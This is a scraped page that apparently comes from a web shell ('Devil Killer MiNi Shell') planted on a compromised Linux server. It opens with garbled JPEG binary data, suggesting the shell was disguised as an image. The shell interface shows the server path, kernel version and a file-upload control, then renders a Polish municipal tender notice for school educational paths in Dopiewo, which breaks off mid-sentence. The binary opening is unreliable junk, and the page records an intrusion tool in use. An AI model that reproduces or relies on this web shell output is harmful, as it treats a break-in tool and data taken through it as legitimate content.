JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240814/0045903601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Utworzenie ścieżek edukacyjnych i ogródka dydaktycznego w Szkołach Podstawowych w Gminie Dopiewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dopiewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258738</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 1c</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dopiewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-070</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@dopiewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.dopiewo.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie ścieżek edukacyjnych i ogródka dydaktycznego w Szkołach Podstawowych w Gminie Dopiewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c4c20ed6-9fa2-497c-8ce3-db49986a7bbc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00459036</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00042325/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Utworzenie ścieżek edukacyjnych i ogródka dydaktycznego w Szkołach Podstawowych w Gminie Dopiewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/dopiewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem platformy zakupowej.<br/>2. Preferuje się, aby komunikacja między zamawiającym a wykonawcami odbywała się w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl i formularza &#34;Wyślij wiadomość do zamawiającego&#34;.<br/>3. Strona internetowa prowadzonego postępowania: https://platformazakupowa.pl/pn/dopiewo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji<br/>elektronicznej, za pośrednictwem platformy zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/dopiewo. Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o<br/>świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r., poz. 344). Zamawiający dopuszcza komunikację za pośrednictwem<br/>poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami:<br/>agnieszka.lewandowska@dopiewo.pl<br/>Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych zostały zawarte w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zwanego<br/>dalej RODO niniejszym informujemy, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Dopiewo, reprezentowana przez Wójta Gminy Dopiewo, 62-070<br/>Dopiewo, ul. Leśna 1c, NIP: 7773133416 (dalej: Administrator).<br/>2. Kontakt z Inspektorem Ochrony Danych (IOD) Administratora jest możliwy za pomocą adresu e-mail: iod@dopiewo.pl.<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu przepisy Ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych, dalej „ustawa Pzp”.<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>6. Pani/Pana dane osobowe nie będą przekazywane odbiorcom w państwach spoza Europejskiego Obszaru Gospodarczego.<br/>7. Pani/Pana dane osobowe nie będą profilowane i nie nastąpi zautomatyzowane podejmowanie decyzji.<br/>8. Pani/Pana dane osobowe będą przechowywane, przez okres co najmniej 5 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli zobowiązania wskazane w ofercie i umowie przekraczają w/w przedział czasowy, okres przechowywania<br/>obejmuje ten termin.<br/>9. Pani/Pana dane osobowe są przetwarzane w systemie, w którym zastosowano środki techniczne i organizacyjne zapewniające<br/>ochronę przetwarzanych danych zgodne z wymaganiami określonymi w przepisach powszechnie obowiązującego prawa.<br/>10. Posiada Pani/Pan:<br/>1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROA.271.22.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 polegające na utworzeniu ścieżki edukacyjnej w Szkole Podstawowej nr 1 w Skórzewie obejmuje: <br/>•	montaż drewnianych gier plenerowych<br/>•	montaż drewnianych tablic edukacyjnych <br/>•	dostawę, rozładunek oraz montaż urządzeń<br/><br/>na szkolnym terenie zewnętrznym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39113600-3 - Ławki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą, zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/><br/>a) Cena – „C”<br/>b) Okres gwarancji – „G” <br/><br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/><br/>Całkowita ocena punktowa = ocena „C” + ocena „G”<br/><br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie wyliczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej.<br/><br/>2. Powyższym kryteriom Zamawiający przypisał następujące znaczenie :<br/><br/>a) kryterium – cena „C” :<br/><br/>Kryterium	Waga %	Liczba punktów Sposób oceny wg wzoru<br/>Cena „C”	60 %	60 Najniższa cena ofertowa brutto niepodlegająca odrzuceniu<br/>C = ------------------------------------------- x 60 pkt.<br/> Cena brutto oferty badanej <br/>niepodlegająca odrzuceniu<br/><br/><br/>Ocenie zostanie poddana cena brutto za realizację zamówienia, wynikająca z formularza ofertowego. Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg powyższego wzoru.<br/><br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium cena wynosi: 60 pkt.<br/><br/>b) kryterium okres gwarancji ( waga 40 %), będzie wyliczona wg następującej zasady: <br/><br/>G = (Gx/Gmax) x 40 pkt.<br/><br/>gdzie : <br/>- G – liczba punktów przyznana ocenianej ofercie w ramach kryterium gwarancja, <br/>- Gmax – gwarancja maksymalna w oferowanych ofertach,<br/>- Gx – gwarancja oferowana w badanej ofercie <br/><br/>Okres gwarancji w formularzu ofertowym należy podać w pełnych miesiącach.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 24 miesięcy.<br/>Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>Jeżeli Wykonawca zaproponuje w ofercie okres gwarancji dłuższy niż 48 miesięcy, termin ten będzie wiążący dla Wykonawcy, jednakże do oceny ofert w kryterium okres gwarancji zostanie przyjęty okres maksymalny określony w SWZ, czyli 48 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące jego oferta zostanie odrzucona.<br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium okres gwarancji wynosi: 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Zadanie 2 polegające na wykonaniu ogródka dydaktycznego w Zespole Szkolno-Przedszkolnym <br/>w Więckowicach obejmuje: <br/>•	montaż drewnianych gier plenerowych<br/>•	montaż drewnianych tablic edukacyjnych <br/>•	montaż zewnętrznej tablicy kredowej <br/>•	montaż ławostołów zapewniających miejsce do przeprowadzania lekcji na świeżym powietrzu<br/>•	montaż domków dla owadów<br/>•	montaż karmników dla ptaków <br/>•	montaż „zielonej klasy” – zadaszonej konstrukcji składającej się z 4 słupów z rozpiętym pomiędzy nimi dachem z materiału, zapewniające miejsce do stworzenia klasy na świeżym powietrzu<br/>•	dostawę, rozładunek oraz montaż urządzeń<br/><br/><br/>na szkolnym terenie zewnętrznym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39113600-3 - Ławki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą, zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/><br/>a) Cena – „C”<br/>b) Okres gwarancji – „G” <br/><br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/><br/>Całkowita ocena punktowa = ocena „C” + ocena „G”<br/><br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie wyliczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej.<br/><br/>2. Powyższym kryteriom Zamawiający przypisał następujące znaczenie :<br/><br/>a) kryterium – cena „C” :<br/><br/>Kryterium	Waga %	Liczba punktów Sposób oceny wg wzoru<br/>Cena „C”	60 %	60 Najniższa cena ofertowa brutto niepodlegająca odrzuceniu<br/>C = ------------------------------------------- x 60 pkt.<br/> Cena brutto oferty badanej <br/>niepodlegająca odrzuceniu<br/><br/><br/>Ocenie zostanie poddana cena brutto za realizację zamówienia, wynikająca z formularza ofertowego. Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg powyższego wzoru.<br/><br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium cena wynosi: 60 pkt.<br/><br/>b) kryterium okres gwarancji ( waga 40 %), będzie wyliczona wg następującej zasady: <br/><br/>G = (Gx/Gmax) x 40 pkt.<br/><br/>gdzie : <br/>- G – liczba punktów przyznana ocenianej ofercie w ramach kryterium gwarancja, <br/>- Gmax – gwarancja maksymalna w oferowanych ofertach,<br/>- Gx – gwarancja oferowana w badanej ofercie <br/><br/>Okres gwarancji w formularzu ofertowym należy podać w pełnych miesiącach.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 24 miesięcy.<br/>Maksymalny okres gwarancji wynosi 48 miesięcy.<br/>Jeżeli Wykonawca zaproponuje w ofercie okres gwarancji dłuższy niż 48 miesięcy, termin ten będzie wiążący dla Wykonawcy, jednakże do oceny ofert w kryterium okres gwarancji zostanie przyjęty okres maksymalny określony w SWZ, czyli 48 miesięcy.<br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 24 miesiące jego oferta zostanie odrzucona.<br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium okres gwarancji wynosi: 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> - Zadanie 3 polegające na utworzeniu ścieżki edukacyjnej w Szkole Podstawowej w Dopiewcu<br/>obejmuje: <br/>•	montaż drewnianych gier plenerowych<br/>•	montaż drewnianych tablic edukacyjnych <br/>•	montaż zewnętrznej tablicy kredowej <br/>•	montaż ławostołów zapewniających miejsce do przeprowadzania lekcji na świeżym powietrzu<br/>•	montaż rzeźb ryb i motyla wraz z tablicami informacyjnymi<br/>•	dostawę, rozładunek oraz montaż urządzeń<br/><br/><br/>na szkolnym terenie zewnętrznym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43325000-7 - Wyposażenie parków i placów zabaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39113600-3 - Ławki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-04</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą, zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/><br/>a) Cena – „C”<br/>b) Okres gwarancji – „G” <br/><br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/><br/>Całkowita ocena punktowa = ocena „C” + ocena „G”<br/><br/>Punktacja przyznawana ofertom w poszczególnych kryteriach będzie wyliczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>Zamawiający nie przewiduje przeprowadzenia dogrywki w formie aukcji elektronicznej.<br/><br/>2. Powyższym kryteriom Zamawiający przypisał następujące znaczenie :<br/><br/>a) kryterium – cena „C” :<br/><br/>Kryterium	Waga %	Liczba punktów Sposób oceny wg wzoru<br/>Cena „C”	60 %	60 Najniższa cena ofertowa brutto niepodlegająca odrzuceniu<br/>C = ------------------------------------------- x 60 pkt.<br/> Cena brutto oferty badanej <br/>niepodlegająca odrzuceniu<br/><br/><br/>Ocenie zostanie poddana cena brutto za realizację zamówienia, wynikająca z formularza ofertowego. Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg powyższego wzoru.<br/><br/>Maksymalna ilość punktów, jaką można uzyskać w kryterium cena wynosi: 60 pkt.<br/><br/>b) kryterium okres gwarancji ( waga 40 %), będzie wyliczona wg następującej zasady: <br/><br/>G = (Gx/Gmax) x 40 pkt.<br/><br/>gdzie : <br/>- G – liczba punktów przyznana ocenianej ofercie w ramach kryterium gwarancja, <br/>- Gmax – gwarancja maksymalna w oferowanych ofertach,<br/>- Gx – gwarancja 